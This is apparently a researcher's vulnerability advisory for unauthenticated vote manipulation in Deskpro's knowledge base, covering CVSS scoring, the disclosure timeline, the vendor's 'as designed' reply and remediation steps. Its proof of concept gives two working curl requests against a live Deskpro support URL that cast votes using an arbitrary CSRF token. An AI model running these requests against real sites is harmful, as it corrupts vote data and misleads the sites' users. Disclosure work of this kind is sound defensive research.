Deskpro Knowledge Base Voting Manipulation
CVE-2026-XXXXX - Unauthenticated vote manipulation vulnerability in Deskpro knowledgebase
Paul Hutchinson
Table of content
- Summary
- Product Information
- Vulnerability Details
- Technical Description
- Proof of Concept
- Video Demonstration
- Impact Assessment
- Business Impact
- CVSS v4.0 Score
- Disclosure Timeline
- Vendor Response
- Recommended Remediation
- Vendor-Side Fixes (Recommended)
- User-Side Mitigations
- CVE Information
- References
- Credits
- Responsible Disclosure
- Disclosure Date: 16 March 2026
- Researcher: Paul Hutchinson, Lexiphanic Ltd
- Severity: MEDIUM (CVSS v4.0: 4.3)
- Status: Disclosed - Vendor does not consider this a security vulnerability
Summary
The Deskpro knowledge base voting system allows unauthenticated manipulation of article votes due to missing request validation, authentication requirements, and rate limiting. This enables any party to artificially inflate or reduce article vote counts, compromising data integrity and feedback metrics across all exposed Deskpro instances.
Product Information
- Vendor: Deskpro
- Product: Deskpro Product (core platform / knowledge base component)
- Affected Versions: All versions with public knowledge base enabled
- Affected Platform: Deskpro installations accessible to unauthenticated users (including deskpro/deskpro-product Docker images)
- Component: Knowledge Base article voting endpoints (vote-up, vote-down)
Vulnerability Details
Technical Description
The voting mechanism for knowledge base articles lacks fundamental security controls. The vote-up and vote-down endpoints accept unauthenticated POST requests without:
- Authentication or session validation
- User identity verification
- Rate limiting or throttling
- CSRF token validation
- CAPTCHA or anti-automation controls
This allows unlimited, automated manipulation of vote counts from any source.
Proof of Concept
The following requests can be executed repeatedly without restriction:
## _dp_csrf_token can be any value.
curl 'https://support.deskpro.com/en-US/kb/articles/overview-of-ticketing-interface/vote-down' \
-H 'content-type: application/x-www-form-urlencoded' \
-b '_dp_csrf_token=h2isn2f21hj2ugrqfv5k;' \
--data-raw '_dp_csrf_token=h2isn2f21hj2ugrqfv5k'
curl 'https://support.deskpro.com/en-US/kb/articles/overview-of-ticketing-interface/vote-up' \
-H 'content-type: application/x-www-form-urlencoded' \
-b '_dp_csrf_token=h2isn2f21hj2ugrqfv5k;' \
--data-raw '_dp_csrf_token=h2isn2f21hj2ugrqfv5k'
Each invocation immediately affects the stored vote count with no validation or throttling.
Video Demonstration
Impact Assessment
Business Impact
- Article Credibility: Vote counts can be manipulated to mislead users about content quality
- Ranking Manipulation: Article visibility and search ranking can be artificially altered
- Reputation Attack: Targeted downvoting campaigns against specific documentation
- Analytics Corruption: Inflated or deflated metrics affect reporting and internal decisions
- Social Engineering: Malicious articles could be artificially promoted for phishing campaigns
CVSS v4.0 Score
Score: 4.3 (MEDIUM)
Vector: AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N
- Attack Vector (AV:N): Network - remotely exploitable
- Attack Complexity (AC:L): Low - no special conditions required
- Attack Requirements (AT:N): None
- Privileges Required (PR:N): None - unauthenticated
- User Interaction (UI:N): None required
- Vulnerable System Confidentiality (VC:L): Low - vote metrics exposed
- Vulnerable System Integrity (VI:L): Low - data integrity compromised
- Vulnerable System Availability (VA:N): None
This represents a data integrity vulnerability rather than direct security access or data exposure.
Disclosure Timeline
| Date | Event |
|---|---|
| 6 March 2026 | Initial vulnerability report submitted to Deskpro Security Team |
| 10 March 2026 | Vendor response received - classified as product behaviour, not a security issue |
| 10 March 2026 | Follow-up sent noting intent to request CVE for transparency and tracking |
| 16 March 2026 | CVE request submitted to MITRE CNA of Last Resort |
| 16 June 2026 | Public disclosure |
Vendor Response
Deskpro's security team reviewed the report and responded that the knowledge base voting functionality is intentionally available to unauthenticated users to enable quick visitor feedback. They classified this as product behaviour rather than a security vulnerability.
The vendor indicated they would pass feedback to the relevant team for consideration of future improvements, such as additional abuse protections.
Despite the vendor's position, we proceeded with a CVE request to ensure transparent tracking across installations, as the absence of validation controls represents a data integrity issue that could have reputational and operational impact on public deployments.
Vendor did not provide additional response or vendor statement after follow-up.
Recommended Remediation
Organizations using Deskpro with public knowledge bases should consider the following mitigations:
Vendor-Side Fixes (Recommended)
- Implement authentication requirement - Tie voting actions to authenticated user sessions
- Server-side rate limiting - Apply per-user or per-IP throttling (e.g., 5 votes per hour)
- CSRF protection - Add token validation to voting endpoints
- CAPTCHA integration - Prevent automated abuse with human verification
- IP fingerprinting - Track and limit votes from single sources
- Cookie-based vote tracking - Use persistent identifiers to prevent duplicate votes
User-Side Mitigations
Until vendor fixes are available:
- Monitor vote analytics for unusual patterns or spikes
- Disable public voting if data integrity is critical
- Implement web application firewall (WAF) rules to rate-limit voting endpoints
- Use reverse proxy rate limiting as temporary protection
CVE Information
- CVE ID: CVE-2026-XXXXX (pending assignment)
- CNA: MITRE CNA of Last Resort
- Classification: Data Integrity / Functional Abuse
References
- Deskpro Official Site
- Deskpro Support Ticket
- Deskpro Docker Image
- CVSS v4.0 Calculator
- MITRE CVE Program
Credits
- Researcher: Paul Hutchinson
- Organization: Lexiphanic Ltd
- Contact: paul@lexiphanic.co.uk
- GitHub: happypaul55
Responsible Disclosure
This vulnerability was responsibly disclosed to the vendor in accordance with coordinated disclosure practices. The vendor was offered a 90‑day window to investigate, remediate, and provide a statement for coordinated disclosure.
Following their review, the vendor classified the issue as "product as designed" and did not consider it a security vulnerability. As no remediation was planned, public disclosure proceeded after notifying the vendor and submitting a CVE request for transparency and tracking purposes.
This research was conducted as part of Lexiphanic Ltd's ongoing security research program. If you have questions about this disclosure or would like to report a security issue, please contact paul@lexiphanic.co.uk.